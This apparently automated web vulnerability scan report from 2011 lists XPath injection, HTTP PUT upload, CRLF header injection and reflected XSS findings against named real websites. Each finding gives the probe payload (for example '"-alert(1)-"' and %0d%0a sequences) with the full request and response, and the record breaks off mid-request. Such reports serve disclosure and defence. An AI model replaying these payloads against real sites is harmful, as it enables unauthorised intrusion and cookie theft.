Date: Sat, 02 Apr 2011 12:44:13 GMT
Server: Apache
Set-Cookie: flsid=899145ae9fb41c146ae6e41bb855b653; path=/
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 31 Mar 2011 05:45:51 GMT
Set-Cookie: fl-uid=03f6276b0fa2982d890f0193e189b615%2C1%2C1301748253; expires=Sun, 01-Apr-2012 12:44:13 GMT; path=/; domain=.thefind.com
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 78472
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>TheFind - Shopped &amp; Found</title>


<script type="text/javascri
...[SNIP]...
<script type="text/javascript" src="//cdn.thefind.com/scripts/main/utils-initjquery-elation-browser-tracking-panel-ajaxlib-events-ui-msie~xpath/tplmgr-tplmgr/ui-infobox/user-user/marketing-bigpicture/jquery-suggest/search-suggest-input-search">
...[SNIP]...
3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wwe.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wwe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.17
Last-Modified: Fri, 01 Apr 2011 16:47:30 +0000
Vary: Cookie
ETag: "1301676450"
X-App: p5tyr3
Content-Type: text/html; charset=utf-8
X-Varnish: 1587144406 1587143361
X-CacheTyr-Server: p5tyr3
X-CacheTyr: HIT
X-CacheTyr-Hits: 1
X-Cacheable: NO: beresp.status 1
X-Cacheable-status: 404
Content-Length: 53517
X-Varnish: 979578143 959694108
X-CacheKyte-Server: p5kyte7
X-CacheKyte: HIT
X-CacheKyte-Hits: 1002095
Vary: Accept-Encoding
Cache-Control: public, must-revalidate, max-age=11294
Date: Sat, 02 Apr 2011 13:39:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...

jQuery.extend(Drupal.settings, {"basePath":"\/","automodal":{".automodal":{"autoFit":false,"draggable":true,"width":2000,"height":2000,"automodalClose":true,"automodalReload":false}},"jcarousel":{"ajaxPath":"\/jcarousel\/ajax\/views"},"twitter_enabled":true,"getQ":"node\/16810560","views":{"ajax_path":"\/views\/ajax","ajaxViews":[{"view_name":"promo_pod","view_display_id":"block_1","view_args":"","view_
...[SNIP]...
4. HTTP PUT enabled  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Issue detail

HTTP PUT is enabled on the web server. The file /9a847644e2391b55.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr
Content-Length: 16

facafbdd945895ba

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Sat, 02 Apr 2011 12:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://activresa-secure2.icor.fr/9a847644e2391b55.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /9a847644e2391b55.txt HTTP/1.0
Host: activresa-secure2.icor.fr

Response 2

HTTP/1.1 200 OK
Cache-Control: max-age=60
Content-Length: 16
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 12:48:23 GMT
Accept-Ranges: bytes
ETag: W/"5222c64034f1cb1:3765"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:48:23 GMT
Connection: close

facafbdd945895ba
5. HTTP header injection  previous  next
There are 15 instances of this issue:

5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7805c%0d%0aa049615f928 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7805c%0d%0aa049615f928 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ew.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:32:14 GMT
Location: http://www.ew.com/ew/7805c
a049615f928
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ew.com/ew/78
...[SNIP]...
5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.familyeducation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2afbc%0d%0a10ac4b7e696 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico2afbc%0d%0a10ac4b7e696 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familyeducation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:57:17 GMT
Location: /defaultpage.htm?/favicon.ico2afbc
10ac4b7e696

5.3. http://www.health.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.health.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a5cc2%0d%0a808e9ba22de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a5cc2%0d%0a808e9ba22de HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.health.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:35:15 GMT
Location: http://www.health.com/health/a5cc2
808e9ba22de
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.health.com/h
...[SNIP]...
5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a31ef%0d%0ac36e0392523 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a31ef%0d%0ac36e0392523 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homestead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:35:09 GMT
Location: /a31ef
c36e0392523/

5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b65da%0d%0aa9cfd0405fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b65da%0d%0aa9cfd0405fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:04:58 GMT
Location: http://www.instyle.com/instyle/b65da
a9cfd0405fc
Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.instyle.com/
...[SNIP]...
5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livingsocial.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a8e30%0d%0ab8e0c5a066b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a8e30%0d%0ab8e0c5a066b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livingsocial.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 02 Apr 2011 13:38:58 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://livingsocial.com/a8e30
b8e0c5a066b

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
5.7. http://www.people.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fade4%0d%0a04e193106f1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fade4%0d%0a04e193106f1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.people.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 12:43:26 GMT
Location: http://www.people.com/people/fade4
04e193106f1
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/p
...[SNIP]...
5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 894db%0d%0ab895b7fee0e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /894db%0d%0ab895b7fee0e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplestylewatch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:56:32 GMT
Location: http://www.people.com/894db
b895b7fee0e
Vary: Accept-Encoding
Content-Length: 322
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.people.com/8
...[SNIP]...
5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0d3%0d%0a3d52478bda4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7f0d3%0d%0a3d52478bda4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.salesforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /7f0d3
3d52478bda4/
Date: Sat, 02 Apr 2011 13:46:30 GMT
Content-Length: 77

The URL has moved to <a href="/7f0d3
3d52478bda4/">/7f0d3
3d52478bda4/</a>
5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e81a0%0d%0a052c3a9c4af was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?e81a0%0d%0a052c3a9c4af=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:32 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?e81a0
052c3a9c4af=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...
5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3f544%0d%0a18f859d78f2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /favicon.ico?3f544%0d%0a18f859d78f2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 301
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?3f544
18f859d78f2=1">
</head>
<body><h1>Object Moved</h1>This document may be found <a href=
...[SNIP]...
5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tbo.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fefb7%0d%0ad3916ee3b78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fefb7%0d%0ad3916ee3b78 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tbo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:59:19 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www2.tbo.com/fefb7
d3916ee3b78
Server-Name: media2

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>
5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ff592%0d%0afdec1d1094 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ff592%0d%0afdec1d1094 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisoldhouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:13:11 GMT
Location: http://www.thisoldhouse.com/toh/ff592
fdec1d1094
Vary: Accept-Encoding
Content-Length: 327
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.thisoldhouse
...[SNIP]...
5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload aa6b8%0d%0a651e1e31954 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /aa6b8%0d%0a651e1e31954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:39:56 GMT
Server: Apache/2.2.16 (Debian)
Location: http://wn.com/aa6b8
651e1e31954
Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://wn.com/aa6b8
65
...[SNIP]...
5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.youravon.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3419d%0d%0a6094b152882 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3419d%0d%0a6094b152882 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youravon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Location: http://3419d
6094b152882.avonrepresentative.com/
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://3419d
6094b152882.avonrepresentative.co
...[SNIP]...
6. Cross-site scripting (reflected)  previous  next
There are 122 instances of this issue:

6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b0fb"-alert(1)-"131e368384f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:00:26 GMT
Expires: Sat, 02 Apr 2011 13:00:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
XBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=1b0fb"-alert(1)-"131e368384fhttp://www.webex.com/lpintl/us/banner/next-meeting-together.html?TrackID=1024434");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...
6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61763"-alert(1)-"fd5b291024e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:47 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
HN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ61763"-alert(1)-"fd5b291024e&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscU
...[SNIP]...
6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20aba"-alert(1)-"6d10011bb3f was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
